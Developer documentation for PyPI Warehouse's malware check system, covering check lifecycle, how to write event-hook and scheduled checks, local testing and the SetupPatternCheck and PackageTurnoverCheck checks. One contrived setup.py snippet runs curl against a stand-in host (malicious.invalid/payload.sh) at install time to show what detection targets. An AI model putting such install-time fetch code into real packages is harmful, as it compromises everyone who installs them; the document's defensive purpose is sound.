Malware Checks#

Overview#

This is a high-level diagram of the automated malware check system.

[Figure: Verdict lifecycle diagram]

Checks can be triggered in the following ways:

  • A PyPI user uploads a new File, Release or Project;

  • A schedule;

  • A PyPI administrator initiates an evaluation run.

All of the above triggers call the IMalwareCheckService factory to determine how to execute the check. In production, the DatabaseMalwareCheckService is returned, which runs the check and produces one or more verdicts. PyPI administrators and moderators continuously review verdicts in the Warehouse admin, make determinations about the accuracy of checks, and take further action if needed (e.g. removing a malicious package surfaced by a verdict).

Contributing#

Check Lifecycle#

[Figure: Check lifecycle diagram]

Ideas for new malware checks should first be shared by opening an issue. This will initiate a discussion with PyPI administrators and among the broader Python community about the impact of the proposed check. After soliciting feedback, open a pull request to main containing the code for the new check, unit tests, and accompanying documentation. Once the code is reviewed and merged, it will automatically be deployed to production. PyPI administrators can begin evaluating the malware check by moving it into the evaluation state in the check admin and triggering an evaluation run.

The evaluation run generates verdicts, which are viewable in the verdicts admin. After reviewing the verdicts, the administrator will make a determination and communicate it to the check developer in the initial issue. Here are the possible outcomes:

  • The check provides a low-quality or noisy signal (e.g. many false positives), and should be removed. At this point, the check will be moved into a wiped_out state, removing all verdicts generated by the evaluation run, and the code for the check will be removed in the next release.

  • The check provides a useful signal, but requires modifications. The administrator will request changes in the initial issue.

  • The check provides a useful signal, and the administrator enables it.

Adding New Checks#

All active checks are defined as classes in the warehouse/malware/checks/ directory, and exported from __init__.py. The checks in tests/common/checks/ can serve as templates for developing new checks. To get started, copy the desired check template into warehouse/malware/checks/ and export it from __init__.py. Complex checks that consist of more than a single file should be housed in a subdirectory of warehouse/malware/checks/.
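For example, if a new check were a hypothetical class ExampleFileCheck living in a hypothetical module warehouse/malware/checks/example_file.py, the export might look roughly like this (the real contents of __init__.py will differ):

    # warehouse/malware/checks/__init__.py -- illustrative excerpt only
    from warehouse.malware.checks.example_file import ExampleFileCheck  # hypothetical check

    __all__ = ["ExampleFileCheck"]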

All malware check classes should inherit from warehouse.malware.checks.base.MalwareCheckBase, define a scan method, and set the following fields as class attributes:

  • version - 1 for new checks, incrementing by one with every subsequent change

  • short_description - a terse description of the check’s purpose

  • long_description - a more detailed rationale for the check

  • check_type - either "event_hook" or "scheduled"

For each check type, there is an additional required attribute (skeletons combining these attributes follow this list):

  • hooked_object - only for event_hook checks. The name of the object whose creation triggers a check run. Currently "File", "Release", and "Project" are supported.

  • schedule - only for scheduled checks. This should be represented as a dictionary that is passed to a celery crontab.
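Putting these attributes together, skeletons for a hypothetical "event_hook" check and a hypothetical "scheduled" check might look like the following (the class names, descriptions, and schedule values are illustrative, not part of Warehouse):

    from warehouse.malware.checks.base import MalwareCheckBase


    class ExampleFileCheck(MalwareCheckBase):
        version = 1
        short_description = "An illustrative check of newly uploaded files"
        long_description = "Example used only in this documentation."
        check_type = "event_hook"
        hooked_object = "File"  # run whenever a new File is created

        def scan(self, **kwargs):
            ...  # see below for the kwargs supplied by prepare


    class ExampleTurnoverCheck(MalwareCheckBase):
        version = 1
        short_description = "An illustrative scheduled check"
        long_description = "Example used only in this documentation."
        check_type = "scheduled"
        # Passed to a celery crontab, i.e. crontab(minute=0, hour=3)
        schedule = {"minute": 0, "hour": 3}

        def scan(self, **kwargs):
            ...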

The prepare classmethod in MalwareCheckBase is called as part of every check execution, and contains the logic for building **kwargs that are passed to the check-defined scan method. prepare can be modified to supply additional keyword arguments for complex checks. Currently, it populates the following kwargs for "event_hook" checks:

  • obj_id - the id of the hooked_object

  • file_url - the file url when the hooked_object is a File

All verdicts must be associated with a particular object. For "event_hook" checks, the obj_id should be propagated to verdicts generated by that check. The MalwareVerdict model contains more information about required and optional verdict fields.
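For instance, the scan method of the hypothetical ExampleFileCheck sketched above might consume those kwargs and tie anything it records to the uploaded file (the body is a sketch; consult MalwareCheckBase and the MalwareVerdict model for the actual helpers and fields):

    class ExampleFileCheck(MalwareCheckBase):
        ...

        def scan(self, **kwargs):
            obj_id = kwargs["obj_id"]      # id of the File that triggered this run
            file_url = kwargs["file_url"]  # populated because hooked_object is "File"

            # ... fetch and inspect the file contents here ...

            # Any verdict recorded for this run should reference obj_id so that
            # it is associated with the uploaded File (see MalwareVerdict for
            # the required and optional fields).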

Modifying Existing Checks#

Every time the code for an existing check is modified, the developer should increment the check's version number. This ensures that each verdict is associated with a particular version of a check.
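For example, if the scan logic of the hypothetical ExampleFileCheck above were changed, its version attribute would be bumped at the same time:

    class ExampleFileCheck(MalwareCheckBase):
        version = 2  # incremented from 1 because the scan logic changed
        ...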

Workflow and Testing#

There are a few steps for executing new malware checks in a development environment:

  1. Complete the Getting Started instructions to set up a Warehouse development environment

  2. Open dev/environment and set the MALWARE_CHECK_BACKEND variable

    MALWARE_CHECK_BACKEND=warehouse.malware.services.DatabaseMalwareCheckService
    

    By default in the development environment, Warehouse will only print the name of the queued check instead of executing it.

  3. Add your new malware check to the database.

    docker compose run web python -m warehouse malware sync-checks
    
  4. Start Warehouse

    make serve
    
  5. Log in to Warehouse in the browser as ewdurbin:password and navigate to /admin/checks

  6. Click on the check name and set the check state to evaluation

  7. Run an evaluation

  8. View the results of the evaluation at /admin/verdicts

  9. For hooked checks, it may be useful to run the check against an object (e.g. File, Release, or Project) that triggers a threat verdict. Set the check state to “enabled” in the check admin and upload some malicious content with twine. For example, if you’re running Warehouse locally, upload a malicious file by running the following command from the directory containing your built package.

    twine upload --repository-url http://localhost/legacy/ dist/*
    

Once you’ve manually validated the basic functioning of your check, add tests to the tests directory. See Submitting patches for more information about how to contribute.

Existing Checks#

Currently, there are two enabled checks in Warehouse.

SetupPatternCheck#

SetupPatternCheck is an "event_hook" check that scans the setup.py file of source distributions upon file upload, looking for potentially malicious code that would execute automatically on package install.
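As background, setup.py is ordinary Python that runs when a source distribution is built or installed, so any top-level statement executes automatically. A contrived example of the kind of behavior such a check is concerned with (purely illustrative, not taken from Warehouse's detection rules):

    # setup.py -- contrived example of install-time code execution
    import subprocess

    # Runs as soon as setup.py is executed, e.g. during "pip install" of the sdist
    subprocess.run(["curl", "http://malicious.invalid/payload.sh"], check=False)

    from setuptools import setup

    setup(name="example-package", version="0.0.1")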

PackageTurnoverCheck#

PackageTurnoverCheck is a "scheduled" check that runs daily to look for suspicious user behavior around package ownership.

Historical Context#

In September 2019, the Python Software Foundation issued a Request for Proposal for a system to automate the detection of malicious uploads. This system was initially rolled out in February 2020 by pull request 7377.